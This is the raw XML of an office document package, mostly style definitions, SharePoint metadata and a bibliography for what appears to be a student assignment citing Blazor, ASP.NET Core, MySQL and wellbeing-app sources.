  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextbublinyChar"/>
    <w:qFormat/>
    <w:rsid w:val="00350aec"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="tmutat" w:customStyle="1">
    <w:name w:val="Útmutató"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00267677"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240"/>
      <w:ind w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="tmutatcm" w:customStyle="1">
    <w:name w:val="Útmutató cím"/>
    <w:basedOn w:val="tmutat"/>
    <w:qFormat/>
    <w:rsid w:val="0090541f"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nyilatkozatszveg" w:customStyle="1">
    <w:name w:val="Nyilatkozat szöveg"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00854bdc"/>
    <w:pPr>
      <w:ind w:hanging="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Nyilatkozatalrs" w:customStyle="1">
    <w:name w:val="Nyilatkozat aláírás"/>
    <w:basedOn w:val="Nyilatkozatszveg"/>
    <w:qFormat/>
    <w:rsid w:val="00854bdc"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="center" w:pos="6237" w:leader="none"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:start="3686"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cmlaplog" w:customStyle="1">
    <w:name w:val="Címlap logó"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00d429f2"/>
    <w:pPr>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cmlapkarstanszk" w:customStyle="1">
    <w:name w:val="Címlap kar és tanszék"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00171054"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Cmlapegyetem" w:customStyle="1">
    <w:name w:val="Címlap egyetem"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00171054"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="0"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="VrazncittChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="4" w:color="4F81BD"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="280"/>
      <w:ind w:start="936" w:end="936"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:pPr>
      <w:ind w:start="708"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CittChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:pPr/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="003f5425"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:firstLine="720"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="hu-HU" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Picture" w:customStyle="1">
    <w:name w:val="Picture"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Caption"/>
    <w:qFormat/>
    <w:rsid w:val="002841f9"/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="120"/>
      <w:ind w:hanging="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Code" w:customStyle="1">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00225f65"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="left" w:pos="851" w:leader="none"/>
        <w:tab w:val="left" w:pos="1418" w:leader="none"/>
        <w:tab w:val="left" w:pos="1985" w:leader="none"/>
        <w:tab w:val="left" w:pos="2552" w:leader="none"/>
        <w:tab w:val="left" w:pos="3119" w:leader="none"/>
        <w:tab w:val="left" w:pos="3686" w:leader="none"/>
        <w:tab w:val="left" w:pos="4253" w:leader="none"/>
        <w:tab w:val="left" w:pos="4820" w:leader="none"/>
        <w:tab w:val="left" w:pos="5387" w:leader="none"/>
        <w:tab w:val="left" w:pos="5954" w:leader="none"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="240"/>
      <w:ind w:hanging="0" w:start="284"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>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01192f"/>
    <w:pPr>
      <w:keepLines/>
      <w:pageBreakBefore w:val="false"/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:lineRule="auto" w:line="276" w:before="480" w:after="0"/>
      <w:ind w:firstLine="720"/>
      <w:jc w:val="start"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:color w:val="365F91"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="hu-HU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Headline" w:customStyle="1">
    <w:name w:val="Headline"/>
    <w:basedOn w:val="Fejezetcimszmozsnlkl"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00b96880"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextkomenteChar"/>
    <w:rsid w:val="00630a92"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="annotationsubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="PedmtkomenteChar"/>
    <w:qFormat/>
    <w:rsid w:val="00630a92"/>
    <w:pPr/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009b2eed"/>
    <w:pPr>
      <w:ind w:hanging="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="0046068c"/>
    <w:pPr>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="hu-HU" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="NoList" w:default="1">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="numbering" w:styleId="tmutat-felsorols" w:customStyle="1">
    <w:name w:val="Útmutató - felsorolás"/>
    <w:qFormat/>
    <w:rsid w:val="000062f4"/>
  </w:style>
  <w:style w:type="numbering" w:styleId="tmutatfelsorols" w:customStyle="1">
    <w:name w:val="Útmutató felsorolás"/>
    <w:qFormat/>
    <w:rsid w:val="003a4cdb"/>
  </w:style>
  <w:style w:type="numbering" w:styleId="StyleOutlinenumberedSymbolsymbol11ptBoldLeft0cm" w:customStyle="1">
    <w:name w:val="Style Outline numbered Symbol (symbol) 11 pt Bold Left:  0 cm ..."/>
    <w:qFormat/>
    <w:rsid w:val="003a4cdb"/>
  </w:style>
  <w:style w:type="numbering" w:styleId="StyleOutlinenumberedSymbolsymbol11ptBoldLeft0cm1" w:customStyle="1">
    <w:name w:val="Style Outline numbered Symbol (symbol) 11 pt Bold Left:  0 cm ...1"/>
    <w:qFormat/>
    <w:rsid w:val="003a4cdb"/>
  </w:style>
  <w:style w:type="numbering" w:styleId="tmutatszmozottlista" w:customStyle="1">
    <w:name w:val="Útmutató számozott lista"/>
    <w:qFormat/>
    <w:rsid w:val="00d429f2"/>
  </w:style>
  <w:style w:type="numbering" w:styleId="Irodalomjegyzkttel" w:customStyle="1">
    <w:name w:val="Irodalomjegyzék tétel"/>
    <w:qFormat/>
    <w:rsid w:val="006f512e"/>
  </w:style>
  <w:style w:type="numbering" w:styleId="tmutatlista" w:customStyle="1">
    <w:name w:val="Útmutató lista"/>
    <w:qFormat/>
    <w:rsid w:val="00267677"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="Normlntabulka">
    <w:name w:val="Normal Table"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="Mkatabulky">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Normlntabulka"/>
    <w:rsid w:val="002605c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vtltabulkasmkou1">
    <w:name w:val="Grid Table 1 Light"/>
    <w:basedOn w:val="Normlntabulka"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="003512ca"/>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Relationship Id="rId18"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téma">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804405677F68524E887B9BAD647EC267" ma:contentTypeVersion="17" ma:contentTypeDescription="Új dokumentum létrehozása." ma:contentTypeScope="" ma:versionID="76fc60fa35090df738af56597c20442c">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="2c71b88f-36ae-449a-8a52-10e2658bdd67" xmlns:ns4="ae689388-e07a-4908-9d5a-df7298fe66fc" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b0fbbcf4c3d3a80139dc1bb83a4232cb" ns3:_="" ns4:_="">
    <xsd:import namespace="2c71b88f-36ae-449a-8a52-10e2658bdd67"/>
    <xsd:import namespace="ae689388-e07a-4908-9d5a-df7298fe66f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71b88f-36ae-449a-8a52-10e2658bdd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689388-e07a-4908-9d5a-df7298fe66fc" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="SharedWithUsers" ma:index="20"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Megosztva részletekkel" ma:internalName="SharedWithDetails" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="SharingHintHash" ma:index="22" nillable="true" ma:displayName="Megosztási tipp kivonat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c71b88f-36ae-449a-8a52-10e2658bdd67"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Mic24</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0073F013-6D5F-4606-9619-199470B72B61}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Microsoft</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>What is ASP.NET Core</b:Title>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>September</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://dotnet.microsoft.com/en-us/learn/aspnet/what-is-aspnet-core</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gra19</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0023DC8F-EE4E-49BF-8AA1-FC23135D0750}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Adobe Acrobat Team</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Fast-forward — comparing a 1980s supercomputer to the modern smartphone</b:Title>
    <b:Year>2022</b:Year>
    <b:Month>August</b:Month>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>04</b:DayAccessed>
    <b:URL>https://blog.adobe.com/en/publish/2022/11/08/fast-forward-comparing-1980s-supercomputer-to-modern-smartphone</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic242</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{11AB6DA6-D471-47C8-9787-23B1CD788504}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Microsoft</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>How Blazor works</b:Title>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>10</b:DayAccessed>
    <b:URL>https://learn.microsoft.com/en-us/training/modules/blazor-introduction/3-how-blazor-works</b:URL>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic241</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{DC716AFD-7D9B-4295-ACEB-8ABB9F132259}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Microsoft</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>What is Blazor?</b:Title>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>10</b:DayAccessed>
    <b:URL>https://learn.microsoft.com/en-us/training/modules/blazor-introduction/2-what-is-blazor</b:URL>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ora24</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{8E8F59A1-5E4C-4F43-B41B-AF71B2F4EDAF}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Oracle</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>What is MySQL</b:Title>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>02</b:DayAccessed>
    <b:URL>https://dev.mysql.com/doc/refman/8.0/en/what-is-mysql.html</b:URL>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gui24</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{8C606573-84FB-4A74-B857-392099D032A0}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Ros</b:Last>
            <b:First>Guillem</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>How to use Hevy</b:Title>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>10</b:DayAccessed>
    <b:URL>https://www.hevyapp.com/hevy-tutorial/</b:URL>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Bog24</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{592DD6F7-663A-47C9-B4E1-4508265F7112}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sandu</b:Last>
            <b:First>Bogdan</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>5 Apps Like Finch To Improve Your Mental Health</b:Title>
    <b:ProductionCompany>TMS</b:ProductionCompany>
    <b:Year>2024</b:Year>
    <b:Month>Febuary</b:Month>
    <b:Day>11</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>10</b:DayAccessed>
    <b:URL>https://tms-outsource.com/blog/posts/apps-like-finch/</b:URL>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ahe24</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{23598039-5EFF-4BD6-9269-048E3EDFDABC}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Ahead</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Daylio - A Wellbeing App</b:Title>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>10</b:DayAccessed>
    <b:URL>https://www.ahead.ie/daylio</b:URL>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>StackOverflow</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{71F50902-896D-478C-9DF6-FA3A50AAEBF3}</b:Guid>
    <b:Title>Stack Overflow Developer Survey 2024</b:Title>
    <b:Year>2024</b:Year>
    <b:Author>
      <b:Author>
        <b:Corporate>Stack Overflow</b:Corporate>
      </b:Author>
    </b:Author>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>14</b:DayAccessed>
    <b:URL>https://survey.stackoverflow.co/2024/technology/#2-web-frameworks-and-technologies</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>OWA23</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{57833A1F-D5C4-4D76-85A8-7F5C9B810612}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>OWASP</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Password Storage Cheat Sheet</b:Title>
    <b:Year>2023</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>17</b:DayAccessed>
    <b:URL>https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</b:URL>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic243</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{D44DA361-7CAA-46D6-B1DB-B852A944FA49}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Microsoft</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Build a .NET MAUI Blazor Hybrid app with a Blazor Web App</b:Title>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>October</b:MonthAccessed>
    <b:DayAccessed>17</b:DayAccessed>
    <b:URL>https://learn.microsoft.com/en-us/aspnet/core/blazor/hybrid/tutorials/maui-blazor-web-app?view=aspnetcore-8.0</b:URL>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0B5E8B16-0AFB-408B-BF8C-70E4A1B92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71b88f-36ae-449a-8a52-10e2658bdd67"/>
    <ds:schemaRef ds:uri="ae689388-e07a-4908-9d5a-df7298fe66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A6786E-AF7B-4A38-BBCA-BF31ECFEA1DF}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5283BDE5-2110-47A1-B6BF-261D767F66A4}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="2c71b88f-36ae-449a-8a52-10e2658bdd67"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C30AA391-316B-4E95-AE8C-64681E201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Application>LibreOffice/26.2.4.2$MacOSX_AARCH64 LibreOffice_project/0229ac93fcf0d7cbc6376066c6f35021cef002dc</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>7</Pages>
  <Words>897</Words>
  <Characters>4456</Characters>
  <CharactersWithSpaces>5319</CharactersWithSpaces>
  <Paragraphs>60</Paragraphs>
  <Company>Automatizálási és Alkalmazott Informatikai Tanszék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2026-06-27T09:52:00Z</dcterms:created>
  <dc:creator>Szabó Dániel</dc:creator>
  <dc:description/>
  <dc:language>es-CL</dc:language>
  <cp:lastModifiedBy/>
  <cp:lastPrinted>2024-12-06T09:07:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-08T20:52:18Z</dcterms:modified>
  <cp:revision>24</cp:revision>
  <dc:subject/>
  <dc:title>RUB_Assignment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0x010100804405677F68524E887B9BAD647EC267</vt:lpwstr>
  </property>
</Properties>
</file>